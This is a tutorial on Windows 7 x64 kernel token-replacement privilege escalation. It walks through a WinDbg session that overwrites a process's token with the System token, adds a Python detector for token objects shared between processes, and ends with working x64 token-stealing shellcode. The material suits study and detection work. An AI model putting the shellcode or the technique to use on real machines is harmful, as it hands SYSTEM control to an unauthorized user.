Token Replacement Privilege Escalation Experiment


Token replacement is the most common operation in Windows kernel privilege escalation.

Here we explain what a Token is and how replacing a Token achieves privilege escalation.

First we write a small test program; it simply creates a cmd process.

//RunCmd.exe

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main(void)
{
    printf("Before Run cmd ..\n");   // pause here so the process token can be inspected in the debugger
    getchar();

    system("cmd");                   // the child cmd.exe inherits this process's primary token
    return 0;
}

Why create a child process? Because after replacing the Token we cannot directly observe the change of user in the parent process itself.

The child process, however, inherits the parent's Token attributes, so if the child we create runs as a high-privilege user, that shows the replacement succeeded.

Let's look at this program's Token:

// win7x64
kd> !process 0 0
...
PROCESS fffffa8002276060
    SessionId: 1  Cid: 0274    Peb: 7efdf000  ParentCid: 0838
    DirBase: 785ad000  ObjectTable: fffff8a00b5d5530  HandleCount:  12.
    Image: RunCmd.exe

kd> dt _EPROCESS fffffa8002276060 -d Token
nt!_EPROCESS
   +0x208 Token : _EX_FAST_REF

We can see that the Token offset is 0x208; now look at the Token's value:

kd> dq fffffa8002276060 + 0x208
fffffa80`02276268  fffff8a0`07d333e8 00000000`00068031

or:

kd>  dt _EX_FAST_REF 0xfffffa8002276060 + 0x208
nt!_EX_FAST_REF
   +0x000 Object           : 0xfffff8a0`07d333e8 Void
   +0x000 RefCnt           : 0y1000
   +0x000 Value            : 0xfffff8a0`07d333e8

We can see that the Value is 0xfffff8a0`07d333e8.

Note that the low 4 bits of this number hold the token's reference count,

so the real Token pointer is fffff8a0`07d333e0:

kd> ? 0xfffff8a0`07d333e8 & ffffffff`fffffff0
Evaluate expression: -8108766972960 = fffff8a0`07d333e0

We can view the contents of this Token:

kd> dt _TOKEN fffff8a0`07d333e0
nt!_TOKEN
   +0x000 TokenSource      : _TOKEN_SOURCE
   +0x010 TokenId          : _LUID
   +0x018 AuthenticationId : _LUID
   +0x020 ParentTokenId    : _LUID
   +0x028 ExpirationTime   : _LARGE_INTEGER 0x7fffffff`ffffffff
   +0x030 TokenLock        : 0xfffffa80`03054880 _ERESOURCE
   +0x038 ModifiedId       : _LUID
   +0x040 Privileges       : _SEP_TOKEN_PRIVILEGES
   +0x058 AuditPolicy      : _SEP_AUDIT_POLICY
   +0x074 SessionId        : 1
   +0x078 UserAndGroupCount : 0xd
   +0x07c RestrictedSidCount : 0
   +0x080 VariableLength   : 0x264
   +0x084 DynamicCharged   : 0x400
   +0x088 DynamicAvailable : 0
   +0x08c DefaultOwnerIndex : 3
   +0x090 UserAndGroups    : 0xfffff8a0`07d336e8 _SID_AND_ATTRIBUTES
   +0x098 RestrictedSids   : (null) 
   +0x0a0 PrimaryGroup     : 0xfffff8a0`06ee56c0 Void
   +0x0a8 DynamicPart      : 0xfffff8a0`06ee56c0  -> 0x501
   +0x0b0 DefaultDacl      : 0xfffff8a0`06ee56dc _ACL
   +0x0b8 TokenType        : 1 ( TokenPrimary )
   +0x0bc ImpersonationLevel : 0 ( SecurityAnonymous )
   +0x0c0 TokenFlags       : 0x2000
   +0x0c4 TokenInUse       : 0x1 ''
   +0x0c8 IntegrityLevelIndex : 0xc
   +0x0cc MandatoryPolicy  : 3
   +0x0d0 LogonSession     : 0xfffff8a0`01bf4830 _SEP_LOGON_SESSION_REFERENCES
   +0x0d8 OriginatingLogonSession : _LUID
   +0x0e0 SidHash          : _SID_AND_ATTRIBUTES_HASH
   +0x1f0 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH
   +0x300 pSecurityAttributes : 0xfffff8a0`02ee5a70 _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
   +0x308 VariablePart     : 0xfffff8a0`07d337b8

Or:

kd> !token fffff8a0`07d333e0
_TOKEN 0xfffff8a007d333e0
TS Session ID: 0x1
User: S-1-5-21-1071733736-4194771383-3987741639-500
User Groups: 
 00 S-1-5-21-1071733736-4194771383-3987741639-513
    Attributes - Mandatory Default Enabled 
 01 S-1-1-0
    Attributes - Mandatory Default Enabled 
 02 S-1-5-32-544
    Attributes - Mandatory Default Enabled Owner 
 03 S-1-5-32-545
    Attributes - Mandatory Default Enabled 
 04 S-1-5-4
    Attributes - Mandatory Default Enabled 
 05 S-1-2-1
    Attributes - Mandatory Default Enabled 
 06 S-1-5-11
    Attributes - Mandatory Default Enabled 
 07 S-1-5-15
    Attributes - Mandatory Default Enabled 
 08 S-1-5-5-0-90708
    Attributes - Mandatory Default Enabled LogonId 
 09 S-1-2-0
    Attributes - Mandatory Default Enabled 
 10 S-1-5-64-10
    Attributes - Mandatory Default Enabled 
 11 S-1-16-12288
    Attributes - GroupIntegrity GroupIntegrityEnabled 
Primary Group: S-1-5-21-1071733736-4194771383-3987741639-513
Privs: 
 05 0x000000005 SeIncreaseQuotaPrivilege          Attributes - 
 08 0x000000008 SeSecurityPrivilege               Attributes - 
 09 0x000000009 SeTakeOwnershipPrivilege          Attributes - 
 10 0x00000000a SeLoadDriverPrivilege             Attributes - 
 11 0x00000000b SeSystemProfilePrivilege          Attributes - 
 12 0x00000000c SeSystemtimePrivilege             Attributes - 
 13 0x00000000d SeProfileSingleProcessPrivilege   Attributes - 
 14 0x00000000e SeIncreaseBasePriorityPrivilege   Attributes - 
 15 0x00000000f SeCreatePagefilePrivilege         Attributes - 
 17 0x000000011 SeBackupPrivilege                 Attributes - 
 18 0x000000012 SeRestorePrivilege                Attributes - 
 19 0x000000013 SeShutdownPrivilege               Attributes - 
 20 0x000000014 SeDebugPrivilege                  Attributes - 
 22 0x000000016 SeSystemEnvironmentPrivilege      Attributes - 
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default 
 24 0x000000018 SeRemoteShutdownPrivilege         Attributes - 
 25 0x000000019 SeUndockPrivilege                 Attributes - 
 28 0x00000001c SeManageVolumePrivilege           Attributes - 
 29 0x00000001d SeImpersonatePrivilege            Attributes - Enabled Default 
 30 0x00000001e SeCreateGlobalPrivilege           Attributes - Enabled Default 
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes - 
 34 0x000000022 SeTimeZonePrivilege               Attributes - 
 35 0x000000023 SeCreateSymbolicLinkPrivilege     Attributes - 
Authentication ID:         (0,162aa)
Impersonation Level:       Anonymous
TokenType:                 Primary
Source: User32             TokenFlags: 0x2000 ( Token in use )
Token ID: b269a9           ParentToken ID: 0
Modified ID:               (0, b26710)
RestrictedSidCount: 0      RestrictedSids: 0x0000000000000000
OriginatingLogonSession: 3e7

Replacing with the System token pointer

kd> !process 0 0 System
PROCESS fffffa80018d0090
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00187000  ObjectTable: fffff8a0000017f0  HandleCount: 487.
    Image: System

kd> dq fffffa80018d0090 + 208
fffffa80`018d0298  fffff8a0`00004bb4 00000000`00000000

We can see that the System process's Token pointer & reference count is fffff8a0`00004bb4.

Start the replacement:

kd> dq fffffa8002276060 + 208
fffffa80`02276268  fffff8a0`07d333e8 00000000`00068031

kd> eq fffffa8002276060 + 208 fffff8a0`00004bb4

kd> dq fffffa8002276060 + 208
fffffa80`02276268  fffff8a0`00004bb4 00000000`00068031

Now press Enter in the RunCmd window and type the command:

whoami

Privilege escalation succeeded:

[image: output of whoami after the replacement]
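The two facts used above, that the low 4 bits of an _EX_FAST_REF are a cached reference count rather than part of the pointer, and that after the overwrite RunCmd.exe and System point at the same _TOKEN object, can be turned into a detection check. The following Python is an added example, not part of the original post: it decodes _EX_FAST_REF values from `dq` output lines in the format shown above and flags any token object referenced by more than one process, which never happens for normally created processes (each one gets its own primary token object). The process list, the svchost.exe entry and the helper names (`decode_ex_fast_ref`, `parse_dq_first_qword`, `find_shared_tokens`) are constructed for this example.

```python
import re
from collections import defaultdict

# An _EX_FAST_REF stores a cached reference count in the low pointer bits:
# 4 bits on 64-bit Windows (objects are 16-byte aligned), 3 bits on 32-bit.
REFCNT_BITS = {64: 4, 32: 3}

def decode_ex_fast_ref(value, bits=64):
    """Split an _EX_FAST_REF value into (object pointer, cached refcount)."""
    mask = (1 << REFCNT_BITS[bits]) - 1
    return value & ~mask, value & mask

# One 'kd> dq' output line: address, first qword, second qword, with WinDbg's backtick separator.
DQ_LINE = re.compile(r"^([0-9a-f`]+)\s+([0-9a-f`]+)\s+([0-9a-f`]+)\s*$", re.I)

def parse_dq_first_qword(line):
    """Return the first qword of a 'kd> dq' output line as an int."""
    m = DQ_LINE.match(line.strip())
    if not m:
        raise ValueError("not a dq output line: %r" % line)
    return int(m.group(2).replace("`", ""), 16)

# Constructed sample: (image name, EPROCESS address, dq line read at EPROCESS+0x208).
# System and RunCmd.exe repeat the values from the debugger session above;
# the svchost.exe entry is made up to show a process with its own token.
SAMPLE_PROCESSES = [
    ("System",      0xfffffa80018d0090, "fffffa80`018d0298  fffff8a0`00004bb4 00000000`00000000"),
    ("RunCmd.exe",  0xfffffa8002276060, "fffffa80`02276268  fffff8a0`00004bb4 00000000`00068031"),
    ("svchost.exe", 0xfffffa8002a1c060, "fffffa80`02a1c268  fffff8a0`06ee54c8 00000000`00068031"),
]

def find_shared_tokens(processes, system_image="System"):
    """Group processes by decoded _TOKEN pointer and report every token object that is
    referenced by more than one process. Each finding records the pointer, the owning
    images and whether the shared object is the System process's token."""
    by_token = defaultdict(list)
    system_token = None
    for image, eproc, dq_line in processes:
        ptr, _refcnt = decode_ex_fast_ref(parse_dq_first_qword(dq_line))
        by_token[ptr].append((image, eproc))
        if image == system_image:
            system_token = ptr
    findings = []
    for ptr, owners in by_token.items():
        if len(owners) > 1:
            findings.append({
                "token": ptr,
                "processes": [img for img, _ in owners],
                "is_system_token": ptr == system_token,
            })
    return findings

if __name__ == "__main__":
    for f in find_shared_tokens(SAMPLE_PROCESSES):
        print("token %#x shared by %s (System token: %s)"
              % (f["token"], ", ".join(f["processes"]), f["is_system_token"]))
```

On the constructed sample this reports a single finding: token object fffff8a0`00004bb0 referenced by both System and RunCmd.exe. The same walk can be fed from a live kernel debugger session or a memory image by listing each process and reading the qword at EPROCESS+0x208 (the offset shown above is for Windows 7 x64; check it with `dt _EPROCESS Token` on the build being examined).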


As a bonus, here is a piece of x64 token-replacement shellcode:

.CONST
    ; Windows 7 SP1 x64 Offsets
    KTHREAD_OFFSET     equ 188h   ; nt!_KPCR.PcrbData.CurrentThread
    EPROCESS_OFFSET    equ 70h    ; nt!_KTHREAD.ApcState.Process
    SYSTEM_PID         equ 04h    ; SYSTEM Process PID
    FLINK_OFFSET       equ 188h   ; nt!_EPROCESS.ActiveProcessLinks.Flink
    PID_OFFSET         equ 180h   ; nt!_EPROCESS.UniqueProcessId
    TOKEN_OFFSET       equ 208h   ; nt!_EPROCESS.Token

.CODE
ShellcodeTokenReplace PROC
    push rcx
    push rdx

    xor rax, rax
    mov rax, gs:[rax + KTHREAD_OFFSET]
    mov rax, [rax + EPROCESS_OFFSET]

    mov rcx, rax
    mov rdx, SYSTEM_PID

    SearchSystemPID:
        mov rax, [rax + FLINK_OFFSET]
        sub rax, FLINK_OFFSET
        cmp [rax + PID_OFFSET], rdx
        jne SearchSystemPID

    mov rax, [rax + TOKEN_OFFSET]
    mov [rcx + TOKEN_OFFSET], rax

    pop rdx
    pop rcx
    ret
ShellcodeTokenReplace ENDP

END